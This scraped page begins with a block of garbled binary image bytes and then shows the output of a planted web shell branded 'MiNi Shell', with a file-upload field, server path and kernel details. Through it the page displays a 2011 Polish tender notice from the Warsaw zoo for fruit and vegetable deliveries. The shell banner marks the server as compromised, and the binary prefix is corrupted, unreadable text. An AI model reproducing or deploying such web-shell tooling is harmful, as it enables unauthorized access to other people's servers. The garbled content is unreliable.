JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110210/48251-N-2011.html

<p class="kh_header"><b>Warszawa: Dostawa warzyw i owoców, znak: NH-8/10/NK-15/10 powtórne zmodyfikowane</b><br>
<b>Numer ogłoszenia: 48251 - 2011; data zamieszczenia: 10.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ogród Zoologiczny w Warszawie , ul. Ratuszowa 1/3, 03-461 Warszawa, woj. mazowieckie, tel. 022 61940-41 wew. 130 lub 114, faks 022 6195898.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoo.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa warzyw i owoców, znak: NH-8/10/NK-15/10 powtórne zmodyfikowane.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa warzyw i owoców:

	Nazwa	:			Ilość:        KOD CPV: 
Zad.1 owoce tropikalne importowane
Ananas				            297 szt.,	03222112-1,	
Banany				           7875 kg,	03222111-4,
Brzoskwinie			             300 kg,	03222332-9,
Grejpfrut					350 kg,	03222230-4,
Kiwi					305 kg,	03222118-3,
Mandarynki /Klementynki/			1050 kg,	03222240-7,
Mango				             390 szt.,	03222113-8,
Papaja					190 szt.,	03222110-7,
Pomarańcze				975 kg,	03222220-1,
Winogrona				785 kg,	03222340-8,	

Zad.2 owoce ze zbiorów w roku 2010/2011
Gruszki Konferencja			 400 kg,	03222322-6,
Jabłka				            8000 kg,	03222321-9,        
Orzechy włoskie			                80 kg,	03222000-3,
          
Zad.3 warzywa ze zbiorów w roku 2010/2011
Arbuz				              350 kg,   03221000-6,
Brokuł				             200 szt.,	03221430-9,          
Cebula biała			              300 kg,	03221113-1,
Cukinia					50 kg,	03221250-3,
Cykoria				            400 kg,	03221300-9,          
 Kalafior				         235 szt.,	03221420-6,
 Kapusta pekińska		                    1750 kg,	03221400-0,       
 Kapusta czerwona			          100 kg,	03221410-3,
 Kapusta włoska   			           75 szt.,	03221400-0,
 Melony				         335 szt.,	03221200-8,
 Ogórki				         350 kg,	03221270-9,
 Pomidory			         200 kg,	03221240-0,
 Sałata rzymska			         600 szt.,	03221310-2,
 Seler naciowy			         750 szt.,	03221300-9,
         
Zad.4 warzywa ze zbiorów w roku 2011
Arbuz				           850 kg,	03221000-6,
Brokuł				          200 szt.,	03221430-9,          
Cebula biała			          250 kg,	03221113-1,
Cukinia				          150 kg,	03221250-3,
Cykoria				      400 kg,	03221300-9,          
Kalafior				      200 szt.,	03221420-6,
Kapusta pekińska			    2500 kg,	03221400-0,       
Kapusta czerwona			      200 kg,	03221410-3,
Kapusta włoska			     150 szt.,	03221400-0,
Melony				     500 szt.,	03221200-8,
Ogórki				       500 kg,	03221270-9,
Pomidory				     800 kg,	03221240-0,
Sałata rzymska			    500 szt.,	03221310-2,
Seler naciowy			   1000 szt.,	03221300-9,

Zad.5 marchew ze zbiorów w roku 2010/2011 
Marchew konsumpcyjna		       4000 kg,	03221112-4,
Marchew młoda pęczki (po 0,5 kg)	       2000 pęczki,	03221112-4,
Marchew pastewna		        6500 kg, 	03221112-4,

Zad.6 warzywa ze zbiorów w roku 2010/2011    
Buraki ćwikłowe			         650 kg,	03221111-7,
Pietruszka		                      250 kg,	03221110-0,
Por				         700 kg,	03221110-0,
Sałata gruntowa (1 szt.= 250g)	         800 szt.,     03221310-2,
Seler				         500 kg,	03221110-0,

Zad.7 buraki pastewne 
Buraki pastewne			      4000 kg,	03221222-8,     

Zad.8 warzywa
Papryka zielona			      1300 kg,	03221230-7,
Rucola (1 szt.=100g)		       265 szt.,      	03221400-0,
Bakłażany			       525 kg,	03221000-6,
Koper włoski-korzeń		       420 kg,	03221110-0,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.10-7, 03.22.20.00-3, 03.22.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Wykonawca przystępując do przetargu jest zobowiązany wnieść wadium dla poszczególnego zadania w wysokości:
Zad.1 owoce tropikalne importowane- 1900 zł (słownie: jeden tysiąc dziewięćset zł)
Zad.2 owoce ze zbiorów w roku 2010/2011- 700 zł (słownie: siedemset zł)   
Zad.3 warzywa ze zbiorów w roku 2010/2011- 650 zł (słownie: sześćset pięćdziesiąt zł)
Zad.4 warzywa ze zbiorów w roku 2011- 950 zł (słownie: dziewięćset pięćdziesiąt zł)
Zad.5 marchew ze zbiorów w roku 2010/2011- 450 zł (słownie: czterysta pięćdziesiąt zł)  
Zad.6 warzywa ze zbiorów w roku 2010/2011- 300 zł (słownie: trzysta zł)	
Zad.8 warzywa - 600 zł (słownie: sześćset zł)
    2) Wykonawca wnosi wadium  w jednej z  poniżej podanych form:
-	w pieniądzu  - wpłata na konto dokonana przelewem na rachunek bankowy MOZ nr: 24 1030 1508 0000 0005 5005 8022
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	 gwarancjach bankowych
-	w gwarancjach ubezpieczeniowych
-	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz.1158 z dnia 9 listopada 2000r. z późn. zm.). 
Wadium należy wnieść przed upływem terminu składania ofert.
Oferta jest skutecznie zabezpieczona wadium, jeśli pieniądze znajdują się na koncie Zamawiającego w terminie (godzina) składania ofert.
Wadium podlega zwrotowi w przypadkach określonych w art. 46 ust. 1 - 2  Ustawy.
  3) Wykonawca, który nie wniesie wadium na zasadach określonych w Specyfikacji Istotnych Warunków Zamówienia zostanie wykluczony z postępowania zgodnie z art. 24 ust. 2 pkt 2 ustawy Prawo zamówień publicznych.
  4) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta 
      została wybrana:
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
-	zawarcie umowy w sprawie zamówienia stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
-	gdy Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw chyba, że udowodnił, że wynika to z przyczyn nieleżących po jego stronie.
 5) Dowód wniesienia wadium w formie innej niż pieniężna należy załączyć do oferty w formie oryginału.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony, parafowany na każdej stronie i podpisany formularz ofertowy z wykorzystaniem wzoru załącznik nr 2 do SIWZ,
2)	parafowany na każdej stronie przez Wykonawcę wzór umowy- załącznik nr 3,
3)	potwierdzenie wniesienia wadium dot. poszczególnego zadania (dowód wniesienia wadium w formie innej niż pieniężna należy załączyć do oferty w formie oryginału),
4)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
5)	Pełnomocnictwo dla osoby (lub osób) do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, powinno być dołączone do oferty o ile nie wynika ono z innych dokumentów załączonych do oferty. Pełnomocnictwo ma być poświadczone notarialnie. 
6)	W przypadku, gdy kilka podmiotów składa wspólnie ofertę należy dodatkowo dołączyć: umowę regulującą współpracę podmiotów występujących wspólnie.
Dokumenty jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę / osoby uprawnione do podpisania oferty z dopiskiem /za zgodność z oryginałem/.
7)	Wykaz podwykonawców wraz z określeniem zakresu rzeczowego i
	finansowego tej części zamówienia, których wykonanie Wykonawca zamierza
	powierzyć poszczególnym Podwykonawcom. Jeżeli wykonawca będzie
	wykonywał zamówienie sam w Formularzu Ofertowym należy wpisać /Nie
	dotyczy/ (do wykorzystania załącznik do Formularza Ofertowego).
W przypadku składania oferty przez podmioty występujące wspólnie, wykaz
podwykonawców dotyczy wszystkich podmiotów łącznie.
8)	Postanowienia dodatkowe:
   Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania zagranicą, składa odpowiednie oświadczenie lub oświadczenia, zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że:
a) 	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	 nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c) 	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Dostawca nie mający siedziby lub miejsca zamieszkania w Polsce przedstawia odpowiedniki dokumentów wskazanych w pkt 6 ppkt 4 i 5 SIWZ zgodne z prawem kraju ich wystawienia.
Dokumenty te są składane w formie oryginału, odpisu, wypisu, wyciągu lub kopii, przetłumaczonych na język polski, poświadczonych przez polskie placówki konsularne, stosownie do obowiązujących przepisów lub ustalone w formie apostille. Dokumenty sporządzone w języku obcym składane są wraz z tłumaczeniem na język polski, sporządzonym przez tłumacza przysięgłego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoo.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ogród Zoologiczny, ul. Ratuszowa 1/3, 03-461 Warszawa,
Referat ds. zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2011 godzina 11:30, miejsce: Miejski Ogród Zoologiczny, ul. Ratuszowa 1/3, 03-461 Warszawa,
Sekretariat w budynku Dyrekcji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1- owoce tropikalne importowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.1 owoce tropikalne importowane
Ananas	297 szt.,	03222112-1,	
Banany	 7875 kg,	03222111-4,
Brzoskwinie  300 kg,	03222332-9,
Grejpfrut	   350 kg,	03222230-4,
Kiwi	   305 kg,	03222118-3,
Mandarynki /Klementynki/	1050 kg,	03222240-7,
Mango			390 szt.,	03222113-8,
Papaja			190 szt.,	03222110-7,
Pomarańcze	              975 kg,	03222220-1,
Winogrona		785 kg,	03222340-8..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.10-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2-owoce ze zbiorów w roku 2010/2011.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.2 owoce ze zbiorów w roku 2010/2011
Gruszki Konferencja   400 kg,  03222322-6,
Jabłka		 8000 kg, 03222321-9,        
Orzechy włoskie	 80 kg,	03222000-3..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3-warzywa ze zbiorów w roku 2010/2011.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.3 warzywa ze zbiorów w roku 2010/2011
Arbuz  350 kg, 03221000-6,
Brokuł  200 szt., 03221430-9,          
Cebula biała  300 kg, 03221113-1,
Cukinia	    50 kg,	03221250-3,
Cykoria	   400 kg, 03221300-9,         
 Kalafior	  235 szt., 03221420-6,
 Kapusta pekińska	 1750 kg,	 03221400-0,       
 Kapusta czerwona	  100 kg,	 03221410-3,
 Kapusta włoska   	75 szt.,	03221400-0,
 Melony		335 szt.,	03221200-8,
 Ogórki		350 kg,	03221270-9,
 Pomidory	 200 kg,	03221240-0,
 Sałata rzymska	600 szt.,	03221310-2,
 Seler naciowy	750 szt.,	03221300-9..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4-warzywa ze zbiorów w roku 2011.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.4 warzywa ze zbiorów w roku 2011
Arbuz	 850 kg,	03221000-6,
Brokuł	 200 szt., 03221430-9,          
Cebula biała  250 kg, 03221113-1,
Cukinia	 150 kg,	03221250-3,
Cykoria	400 kg,	03221300-9,          
Kalafior	200 szt.,	03221420-6,
Kapusta pekińska	 2500 kg,	 03221400-0,       
Kapusta czerwona	 200 kg,	03221410-3,
Kapusta włoska	150 szt.,	03221400-0,
Melony		 500 szt., 03221200-8,
Ogórki		 500 kg,	03221270-9,
Pomidory		 800 kg,	03221240-0,
Sałata rzymska	500 szt.,	03221310-2,
Seler naciowy	1000 szt.,03221300-9..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5-marchew ze zbiorów w roku 2010/2011.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.5 marchew ze zbiorów w roku 2010/2011 
Marchew konsumpcyjna   4000 kg,		
Marchew młoda pęczki (po 0,5 kg) 2000 pęczki,	
Marchew pastewna  6500 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.12-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6- warzywa ze zbiorów w roku 2010/2011.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.6 warzywa ze zbiorów w roku 2010/2011    
Buraki ćwikłowe  650 kg, 03221111-7,
Pietruszka     250 kg, 03221110-0,
Por	 700 kg,	03221110-0,
Sałata gruntowa (1 szt.= 250g) 800 szt.,  03221310-2,
Seler	 500 kg,	03221110-0..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7- buraki pastewne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.7 buraki pastewne 
Buraki pastewne	4000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.12.22-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8- warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.8 warzywa	
Papryka zielona	 1300 kg,	 03221230-7,
Rucola (1 szt.=100g) 265 szt.,  03221400-0,
Bakłażany  525 kg,	 03221000-6,
Koper włoski-korzeń 420 kg,	03221110-0..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com